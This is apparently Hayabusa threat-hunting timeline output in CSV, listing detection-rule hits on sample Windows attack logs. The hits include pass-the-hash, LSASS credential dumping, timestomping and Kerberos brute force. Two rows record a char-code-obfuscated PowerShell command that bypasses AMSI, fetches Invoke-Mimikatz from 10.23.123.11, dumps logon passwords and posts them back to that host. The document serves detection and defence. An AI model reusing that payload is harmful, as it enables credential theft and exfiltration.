+09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: 
C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157add,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.121 
+09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8157b8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 
,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 
46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 
-C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 
,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 
115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time 
Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: 
Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: 
%TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:sef/srey/admtest/vase/xt/s/ysy/vrat/yvsyv/xc/g/mgdi/rec/vga/ytuntsr/vdr/m,og/b aer/nd/test2/vt/gsdf/dyfgdhbn/tfay/bdcy/sgfg/vs/sfs/uydzry/bsfin/rey/syvsdy/tary/ryver/yvas/vay/tc/ugu/go/test1/xvtrz/ar/nini/tbyt/accrt/wyt IpAddress:::ffff:10.23.123.11 